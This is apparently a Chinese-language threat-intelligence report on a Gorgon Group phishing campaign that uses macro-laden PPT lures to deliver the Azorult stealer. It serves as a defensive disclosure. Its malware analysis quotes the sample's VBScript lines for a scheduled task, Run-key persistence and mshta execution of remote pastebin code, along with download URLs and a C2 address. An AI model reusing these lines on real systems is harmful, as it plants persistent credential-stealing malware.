收到“订单、付款收据、分析报告”PPT，请勿打开，为GorgonGroup黑客组织投递的攻击邮件

一、背景

近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码，宏代码会启动mshta执行保存在pastebin上的远程脚本代码，且pastebin URL是由Bitly生成的短链接。

此次攻击的主要特点为恶意代码保存在托管平台pastebin上：包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马，然后将其注入指定进程执行，RAT会不定期更换，当前获取的RAT 木马是Azorult窃密木马。

对比分析发现，攻击者注册的pastebin账号为”lunlayloo”（创建于2019年10月），与另一个账号“hagga”（创建于2018年12月）对应攻击事件中使用的TTP高度相似，因此我们认为两者属于同一家族ManaBotnet，并且”lunlayloo”可能为“hagga”的后继者。

有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group，一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击，包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。

Manabotnet攻击流程

二、详细分析

初始攻击以PPT文档为诱饵，使用的文件名有“SHN FOODS ORDER.ppt”、“PrivateConfidential.ppt”、“Analysis Reports.ppt”、“Order001.ppt”、“payment_receipt.ppt”，邮件主题为Analysis ReportsFrom IDS Group（来自IDS Group的分析报告）、Analysis Reports From NHL – Nam Hoang Long Co.,Ltd（来自NHL公司的分析报告）、Purchase Order2020（2020采购订单）、payment_receipt.ppt（付款收据）等。

Analysis Reports.ppt中包含恶意的VBA宏代码。

如果用户选择启用宏，则会执行命令：mshtahttps[:]//j.mp/ghostis61hazsba，远程代码URL是短链接，还原为https[:]//pastebin.com/raw/FssQ8e8e，恶意代码被保存在托管平台pastebin.com。

以同样方式投递的文档SHN FOODS ORDER.ppt中的宏执行的恶意代码为，https[:]//j.mp/ghjbnzmxc767zxg，短链接还原得到https[:]//pastebin.com/raw/RCd2CLNd，该地址的托管恶意代码页面如下：

通过浏览器的调试功能对该代码进行编码转换可得到VBScript代码：

该代码加入了一些字符反转和字符连接操作，以逃避恶意代码检测，然后执行5个操作进行持久化：

1. 创建计划任务“Murtaba”，每80分钟运行一次远程hta脚本

2. 执行一次hta脚本

3. 在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2下写入执行hta脚本的命令

4. 在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3下写入执行hta脚本的命令

5. 在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\中写入执行hta脚本的命令

CreateObject("WScript.Shell").Run StrReverse("/ 08 om/ ETUNIM cs/ etaerc/ sksathcs") + "tn ""Murtaba"" /tr ""\""'mshta\""http:\\pastebin.com\raw\B7f3BpDk"" /F ",0

CreateObject("WScript.Shell").Run """mshta""""http:\\pastebin.com\raw\B7f3BpDk"""

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\eMse7spS""", "REG_SZ"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\hxKddkar""", "REG_SZ"

CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\", """m" + "s" + "h" + "t" + "a""""http:\\pastebin.com\raw\v2US1QAY""", "REG_SZ"

在计划任务中指定执行的远程hta脚本均https[:]\\pastebin.com\raw\B7f3BpDk，解码为以下文本，同样是一段VBScript代码，在其中以隐藏的方式执行Powershell，首先通过ping google.com测试网络是否连通，然后下载Powershell脚本https[:]//pastebin.com/raw/8ZebE1MG进行base64解码并执行。

计划任务执行的Pastebin保存的VBScript脚本：

VBScript通过Powershell执行Pastebin保存的以base64编码的Powershell脚本：

Base64解码后：

Powershell代码将一个压缩包文件的二进制数据以硬编码形式进行保存，使用时首先将“!”替换为“0x”去除混淆，然后通过IO.MemoryStream将数据读取到内存，最后再使用IO.Compression.GzipStream进行解压，就可以获得一个以.Net编写的DLL并通过Reflection 加载执行：

$t=[System.Reflection.Assembly]::Load($decompressedByteArray);

Powershell获取的另一个PE直接保存了二进制编码在pastebin的URL（https://pastebin.com/raw/f9c50ewQ）上，使用时首先将‘T_B’替换为‘0x’，在分析过程中发URL被动态更换为了：https://pastebin.com/raw/EmyvkN6m，使用时将“^^_^^”替换为“0x”，还原得到PE文件后，将其注入到notepad.exe的内存中执行：

[Givara]::FreeDom(‘notepad.exe’,$Cli2)

https[:]//pastebin.com/raw/f9c50ewQ

https[:]//pastebin.com/raw/EmyvkN6m

.NET编写的DLL名为Apple.dll，入口调用Fuck.FUN，Fuck.FUN随后启动记事本，掏空现有部分的映射，在记事本进程中分配一个新的缓冲区，向该进程中写入有效负载，然后继续执行线程。这样使得攻击者无需将恶意软件写入磁盘，通过计划任务可定期获取注射器（一段攻击代码，用来将RAT注入其他程序）和RAT，并将RAT注入指定进程的内存中执行。

当前作为Payload被下载执行的是Azorult木马，一种使用Delphi编写的窃密木马变种。Azorult已在俄罗斯论坛上出售，价格最高为100美元。

Azorult窃密木马的大多数功能是获取可以在受害者计算机上找到的各类账号密码，例如，电子邮件帐户，通信软件（例如pidgin、 psi+,、telegram），Web Cookie，浏览器历史记录和加密货币钱包，同时该木马还具有上载和下载文件以及截屏的功能。

三、团伙分析

攻击者使用第三方网站（例如Bitly，Blogspot和Pastebin）可能是为了逃避检测，因为这些网站不会被网络防御方判断为恶意网站。但是，诸如Bitly和Pastebin之类的网站会记录访问某个链接的次数。我们能够确定是谁创建了此Pastebin帖子，并统计该链接被访问了多少次。

例如，从页面可以看到托管“Apple.dll”样本的URL已被查看12000多次。这表明有12000台计算机受此攻击影响。但是，由于攻击者使用的是已知的RAT木马，因此实际受影响的计算机数量可能会少得多，因为许多计算机可能已安装了杀毒软件。

“lunlayloo”在2020年3月30日上传的恶意代码，该账户创建于2019年10月23日。

lunlayloo在2020年4月21日上传的恶意代码，托管“AzorultRat”，由于最近才更新，被查看只有77次。

分析时发现攻击Azorult Rat回传数据对应的URL为：

http[:]//23.247.102.120/manabotnet-work/index.php

该URL中包含的“manabotnet”与另一安全公司发现的Pastebin帖子标题：“ MasterManabots-all-bots”相同，该攻击者的Pastebin账号名称为“hagga”，于2018年12月3日创建，另外由于两次攻击使用的TTP高度相似性，所以我们认为他们属于同一家族ManaBots。

unit42在2019年4月对Pastebin账号“HAGGA”发起的攻击活动进行了详细的分析，基于高水平的TTP，包括使用RevengeRAT，unit42认为其与Gorgon Group组织有关。

（https[:]//unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/）

2019年1月腾讯安全御见威胁情报中心也捕获到疑似来自Gorgon Group组织相关的攻击，）（https[:]//www.freebuf.com/column/193603.html），该攻击以“订单”、“支付详单”等主题的钓鱼邮件针对全球的外贸人士进行攻击，行为类似于腾讯安全威胁情报中心多次披露的”商贸信”，攻击者使用blogspot的订阅功能来保存恶意代码。

综合分析以上几次攻击行动，总结该团伙攻击对应的ATT&CK矩阵对应如下，共涉及约44个TTP技术：

Initial Access（初始攻击）
T1193 Spearphishing Attachment

Execution（执行）
T1106 Execution through API
T1129 Execution through Module Load
T1203 Exploitation for Client Execution
T1170 Mshta
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1127 Trusted Developer Utilities

Persistence（持久化）
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Privilege Escalation（权限提升）
T1055 Process Injection
T1053 Scheduled Task

Defense Evasion（防御逃逸）
T1140 Deobfuscate/Decode Files or Information
T1143 Hidden Window
T1170 Mshta
T1027 Obfuscated Files or Information
T1093 Process Hollowing
T1055 Process Injection
T1064 Scripting
T1127 Trusted Developer Utilities
T1102 Web Service

Credential Access（凭证获取）
T1503 Credentials from Web Browsers
T1081 Credentials in Files
T1214 Credentials in Registry
T1539 Steal Web Session Cookie

Discovery（数据发现）
T1083 File and Directory Discovery
T1012 Query Registry
T1518 Software Discovery
T1082 System Information Discovery
T1007 System Service Discovery

Collection（数据采集）
T1123 Audio Capture
T1119 Automated Collection
T1115 Clipboard Data
T1213 Data from Information Repositories
T1005 Data from Local System
T1039 Data from Network Shared Drive
T1074 Data Staged
T1056 Input Capture
T1185 Man in the Browser
T1113 Screen Capture
T1125 Video Capture

Command and Control（命令和控制）
T1094 Custom Command and Control Protocol
T1024 Custom Cryptographic Protocol
T1132 Data Encoding
T1001 Data Obfuscation
T1219 Remote Access Tools
T1105 Remote File Copy
T1102 Web Service

Exfiltration（数据窃取）
T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

其中具有该团伙的代表性的TTP技术点为：

T1170 Mshta

T1086 PowerShell

T1053 ScheduledTask

T1060 RegistryRun Keys / Startup Folder

T1093 ProcessHollowing

T1055 Process Injection

T1102 Web Service

在T1102 Web Service技术上，该团伙经常使用的合法外部Web服务为Bitly、Blogspot和Pastebin，这个技术在ATT&CK矩阵中战术条目中同时属于Defense Evasion（防御逃逸）和Command and Control（命令和控制），在具体攻击过程中体现在可以绕过恶意网址检测，以及可以通过修改托管网站上的URL对应的内容动态控制下载的恶意代码。

四、安全建议

Gorgon Group为专业黑客组织，擅长攻击大型企业、行业及政府背景的机构，腾讯安全威胁情报中心推荐相关单位采用腾讯安全完整解决方案提升系统安全性，防止专业黑客的攻击。

腾讯安全解决方案部署示意图（图片可放大）

腾讯安全产品针对Gorgon Group黑产团伙的解决方案清单

拦截位置	安全产品	解决方案
威胁情报	腾讯T-Sec 威胁情报云查服务（SaaS）	各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。 Gorgon Group相关联的IOCs已入库https://cloud.tencent.com/product/tics
威胁情报	腾讯T-Sec 高级威胁追溯系统	网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。 Gorgon Group相关信息和情报已支持。 T-Sec高级威胁追溯系统的更多信息，可参https://cloud.tencent.com/product/atts
边界防护	云防火墙（Cloud Firewall，CFW）	对云上恶意流量实施拦截阻断。已同步支持Gorgon Group相关联的IOCs识别和拦截。有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw
边界防护	腾讯T-Sec 高级威胁检测系统（腾讯御界）	基于网络流量进行威胁检测，已支持： 1）Gorgon Group相关联的IOCs的识别检测； 2）Gorgon Group投递的恶意附件进行沙箱检测；关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta
终端保护	T-Sec 主机安全（Cloud Workload Protection，CWP）	云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等已支持查杀Gorgon Group组织释放的后门木马程序。关于T-Sec主机安全的更多信息，可参考： https://cloud.tencent.com/product/cwp
终端保护	腾讯T-Sec终端安全管理系统（御点）	企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等 1）可查杀Gorgon Group组织释放的后门木马程序； 2）已支持Gorgon Group诱饵使用的恶意Office宏代码的检测和查杀； 3）主动防御功能可拦截恶意宏代码启动mshta，可拦截Powershell执行恶意脚本。关于T-Sec终端安全管理系统的更多资料，可参考： https://s.tencent.com/product/yd/index.html
个人用户	腾讯电脑管家	腾讯电脑管家已支持对Gorgon Group黑产团伙传播病毒木马的查杀。